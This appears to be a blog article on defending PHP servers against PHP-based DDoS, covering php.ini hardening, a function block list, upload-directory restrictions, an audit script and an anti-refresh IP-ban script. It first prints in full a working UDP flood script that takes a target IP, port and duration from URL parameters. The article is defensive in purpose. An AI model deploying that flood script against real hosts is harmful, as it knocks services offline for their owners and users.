
Detailed explanation of several defense methods for PHP DDoS

WBOY (original), 2016-07-13 10:47:47

PHP DDoS is an attack that abuses a server's own PHP to send the flood traffic; on my server it worked because php.ini was configured with allow_url_fopen = On. Many websites need allow_url_fopen, however, so here are some ways to defend against PHP DDoS.

Let's look at the PHP DDoS code first:


$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand
";
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s n";
?>


Careful readers will notice that fsockopen is the main attack function: the script keeps opening connections and sending data, which drives up the machine's traffic and CPU usage until the website can no longer be accessed normally.

So I briefly studied the structure of the PHP DDoS script and learned a few things. Here are some ways to avoid it as far as possible:

Note: The following operations are risky. Maxthon accepts no responsibility for any consequences, so please proceed with caution.

1. Open php.ini

2. Disable dangerous functions

Different programs need different functions, so add to or remove from the list of disabled functions as your site requires.

Find disable_functions, remove the ";" in front, and add after the equal sign:

phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open,proc_get_status,fsocket,fsockopen

3. Set PHP execution timeout

If the program does not end but has reached the maximum execution time, it will be forced to stop. Please adjust the time as needed.

Find max_execution_time, remove the ";" in front, and add a positive integer after the equal sign in seconds, such as: 30

4. Disable PHP execution permissions in the upload directory

There are roughly three types of servers: IIS, Apache, and Nginx. I won’t write down the specific steps. Here is a link for your reference:

How to cancel directory script execution permissions with iis and apache: http://www.bKjia.c0m/sys/Windows/46232.htm

5. A very violent method

Disable PHP execution outright. This works because many sites can generate static web pages; the cost is that PHP execution has to be turned back on manually each time pages are generated or the site is managed. Several users already use this method. For how to do it, see method 4.

6. Close the user center

CMSs such as dede have a user center with many places for uploading files, which is probably where the problem comes from.

7. Modify the administrator directory

This method will not be discussed in detail, as it is not suitable for all programs.

8. Modify the default management account

Many people habitually use admin as the login name. If the program has a vulnerability, however, the admin password is easy to guess, so it is recommended to change admin to another login name.

9. A complex and memorable password

Whether it is a Windows/Linux system user or a website administrator account, you need to set a password that is difficult to guess, such as: 123hai@tang@.
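A check for the php.ini settings from steps 2 and 3, added here as an example and not part of the original article: it reports which functions from the article's list are still callable and whether the time limit from step 3 is actually set. The `EXTRA_LIST` entries are this example's assumption about what else to disable, since the flood script above calls `set_time_limit(0)` and other stock functions open sockets just as `fsockopen` does.

```php
<?php
// Added example (not from the article): audit the effective settings from
// steps 2 and 3. Run it under the same SAPI as the site (mod_php or PHP-FPM);
// the CLI may load a different php.ini and always sets max_execution_time to 0.

// The article's list, minus "fsocket", which is not a PHP function.
const ARTICLE_LIST = ['phpinfo', 'passthru', 'exec', 'system', 'popen', 'chroot',
    'escapeshellcmd', 'escapeshellarg', 'shell_exec', 'proc_open',
    'proc_get_status', 'fsockopen'];

// Assumption of this example, not in the article: set_time_limit() lets a
// script lift the step 3 limit (the flood script calls set_time_limit(0)),
// and these stock functions open sockets just as fsockopen() does.
const EXTRA_LIST = ['set_time_limit', 'pfsockopen', 'stream_socket_client'];

/** Return a list of findings; an empty list means both steps are in effect. */
function audit_php_settings(string $disableFunctions, int $maxExecutionTime): array
{
    $disabled = array_map('trim', explode(',', strtolower($disableFunctions)));
    $findings = [];
    foreach (array_diff(ARTICLE_LIST, $disabled) as $fn) {
        $findings[] = "step 2: $fn is not in disable_functions";
    }
    foreach (array_diff(EXTRA_LIST, $disabled) as $fn) {
        $findings[] = "extra: $fn is still callable";
    }
    if ($maxExecutionTime <= 0) {
        $findings[] = 'step 3: max_execution_time is 0, so scripts never time out';
    }
    return $findings;
}

// Constructed sample: exactly the value the article says to paste, with 30 s.
$sample = 'phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,'
        . 'shell_exec,proc_open,proc_get_status,fsocket,fsockopen';
echo "Article's settings:\n";
foreach (audit_php_settings($sample, 30) as $f) echo "  [!] $f\n";

// The settings this PHP process is actually running with.
echo "This server:\n";
$live = audit_php_settings((string) ini_get('disable_functions'),
                           (int) ini_get('max_execution_time'));
foreach ($live as $f) echo "  [!] $f\n";
echo $live ? '' : "  ok\n";
```

On Linux, max_execution_time counts only the script's own execution time, not time spent in stream operations and system calls, so treat step 3 as a backstop to step 2 rather than the main control.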

Attached is a PHP script for defending against DDoS attacks:


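<?php
// Check whether this IP is already on the ban list
$ip = $_SERVER['REMOTE_ADDR'];
$fileht = ".htaccess2";                 // ban list, one IP per line
if (!file_exists($fileht)) file_put_contents($fileht, "");
$filehtarr = @file($fileht) ?: array(); // unreadable or empty file: treat as no bans
if (in_array($ip."\r\n", $filehtarr)) die("Warning:"."<br>"."Your IP address are forbided by some reason, IF you have any question Pls emill to shop@mydalle.com!");

// Add to the ban list
$time = time();
$fileforbid = "log/forbidchk.dat";      // strike record: IP, time of first strike, strike count
if (file_exists($fileforbid)) {
    // No new strike for more than 60 seconds: discard the record
    if ($time - filemtime($fileforbid) > 60) unlink($fileforbid);
    else {
        $fileforbidarr = @file($fileforbid);
        if ($ip == substr($fileforbidarr[0], 0, strlen($ip))) {
            // Record older than 600 seconds: discard it
            if ($time - (int)substr($fileforbidarr[1], 0, strlen((string)$time)) > 600) unlink($fileforbid);
            // More than 600 strikes: ban the IP permanently
            elseif ($fileforbidarr[2] > 600) { file_put_contents($fileht, $ip."\r\n", FILE_APPEND | LOCK_EX); unlink($fileforbid); }
            // Otherwise count one more strike
            else { $fileforbidarr[2]++; file_put_contents($fileforbid, $fileforbidarr, LOCK_EX); }
        }
    }
}

// Anti-refresh: limit repeated requests for the same URI from one IP
$str = "";
$file = "log/ipdate.dat";
if (!file_exists("log") && !is_dir("log")) mkdir("log", 0750); // 0750 instead of 0777: not world-writable
if (!file_exists($file)) file_put_contents($file, "");
$allowTime = 120; // anti-refresh window, in seconds
$allowNum = 10;   // number of refreshes allowed within the window
$uri = $_SERVER['REQUEST_URI'];
$checkip = md5($ip);
$checkuri = md5($uri);
$yesno = true;    // stays true while no live record for this IP is found
$ipdate = @file($file) ?: array();
foreach ($ipdate as $k => $v) {
    // Record layout: md5(ip) [32], md5(uri) [32], timestamp [10], count
    $iptem = substr($v, 0, 32);
    $uritem = substr($v, 32, 32);
    $timetem = (int)substr($v, 64, 10);
    $numtem = (int)substr($v, 74);
    if ($time - $timetem < $allowTime) { // records older than the window are dropped
        if ($iptem != $checkip) $str .= $v;
        else {
            $yesno = false;
            // Different URI: start a new count for it
            if ($uritem != $checkuri) $str .= $iptem.$checkuri.$time."1\r\n";
            // Same URI, still under the limit: increment the count
            elseif ($numtem < $allowNum) $str .= $iptem.$uritem.$timetem.($numtem+1)."\r\n";
            else {
                // Over the limit: record a strike, log the request and refuse it
                if (!file_exists($fileforbid)) { $addforbidarr = array($ip."\r\n", time()."\r\n", 1); file_put_contents($fileforbid, $addforbidarr, LOCK_EX); }
                file_put_contents("log/forbided_ip.log", $ip."--".date("Y-m-d H:i:s", time())."--".$uri."\r\n", FILE_APPEND | LOCK_EX);
                $timepass = $timetem + $allowTime - $time;
                die("Warning:"."<br>"."Sorry,you are forbided by refreshing frequently too much, Pls wait for ".$timepass." seconds to continue!");
            }
        }
    }
}
// First request from this IP within the window: create its record
if ($yesno) $str .= $checkip.$checkuri.$time."1\r\n";
file_put_contents($file, $str, LOCK_EX);
?>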

